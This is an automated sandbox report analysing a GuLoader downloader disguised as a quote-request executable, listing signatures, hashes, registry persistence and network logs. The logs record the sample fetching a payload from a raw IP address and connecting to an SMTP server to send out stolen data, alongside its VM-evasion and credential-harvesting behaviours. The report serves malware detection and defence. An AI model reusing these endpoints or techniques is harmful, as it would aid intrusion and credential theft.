Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe

Overview

General Information

Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
Analysis ID:1437983
MD5:c35a5008193e77c7afdf53d7fcc20f37
SHA1:1547e797fc8dfebe43591583b7f8c5d130eafc77
SHA256:b4702b8caff8174aa2faaf8f2e963d6ae79beee73054747db74b2cc21997885c
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • vexplorers.exe (PID: 5400 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: C35A5008193E77C7AFDF53D7FCC20F37)
    • vexplorers.exe (PID: 4944 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: C35A5008193E77C7AFDF53D7FCC20F37)
  • vexplorers.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" MD5: C35A5008193E77C7AFDF53D7FCC20F37)
    • WerFault.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1156 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.111729282817.0000000037E34000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000002.111728526533.0000000037C14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.107397454848.0000000009E7B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000000.00000002.106940804985.0000000009E6B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe PID: 5960JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Outgaming\Henequin.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, ProcessId: 1456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Tekstrkkerne
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, Initiated: true, ProcessId: 1456, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 51320
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Roaming\Outgaming\Henequin.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeReversingLabs: Detection: 18%
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeReversingLabs: Detection: 18%
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeVirustotal: Detection: 16%Perma Link
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Outgaming\Henequin.exeJoe Sandbox ML: detected
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD04D0 CryptUnprotectData,5_2_39FD04D0
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD04C8 CryptUnprotectData,5_2_39FD04C8
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:51317 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:51324 version: TLS 1.2
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Management.pdb source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: System.Management.ni.pdb source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmp
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040635D FindFirstFileW,FindClose,2_2_0040635D
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040580B
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_004027FB FindFirstFileW,2_2_004027FB
            Source: global trafficTCP traffic: 192.168.11.20:51320 -> 185.230.214.164:587
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: ip-api.com
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficTCP traffic: 192.168.11.20:51320 -> 185.230.214.164:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /LkTupLMJe71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 167.160.166.205Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /LkTupLMJe71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 167.160.166.205Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: unknownTCP traffic detected without corresponding DNS query: 167.160.166.205
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /LkTupLMJe71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 167.160.166.205Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /LkTupLMJe71.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 167.160.166.205Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037FFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/FALSE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: smtp.zoho.eu
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000000.00000000.106615363046.0000000000409000.00000008.00000001.01000000.00000003.sdmp, RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51317
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51324
            Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 443
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:51317 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:51324 version: TLS 1.2
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052B8

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040326A
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_004066E20_2_004066E2
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_00404AF50_2_00404AF5
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_004066E22_2_004066E2
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_00404AF52_2_00404AF5
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_001149582_2_00114958
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0011AAAA2_2_0011AAAA
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_00113D402_2_00113D40
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0011CDD82_2_0011CDD8
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_001140882_2_00114088
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7CB2C02_2_3A7CB2C0
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7CA3702_2_3A7CA370
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7C57102_2_3A7C5710
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7C2BF82_2_3A7C2BF8
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7C4D302_2_3A7C4D30
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7C67C02_2_3A7C67C0
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A7CD4E82_2_3A7CD4E8
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_3A8908D02_2_3A8908D0
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_001540885_2_00154088
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_001549585_2_00154958
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_0015D3805_2_0015D380
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_00153D405_2_00153D40
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD4D305_2_39FD4D30
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD2BF85_2_39FD2BF8
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD57105_2_39FD5710
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD6EA85_2_39FD6EA8
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD11615_2_39FD1161
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FDD4E85_2_39FDD4E8
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_39FD67C05_2_39FD67C0
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeCode function: 5_2_3A9008D05_2_3A9008D0
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: String function: 00402BBF appears 53 times
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1156
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: invalid certificate
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamediscernible.exe0 vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111733816119.000000006A7E0000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Management.dllT vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111736754847.000000006FE4B000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/23@4/4
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040326A
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404579
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyedJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1952
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile created: C:\Users\user\AppData\Local\Temp\nsv34CB.tmpJump to behavior
            Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
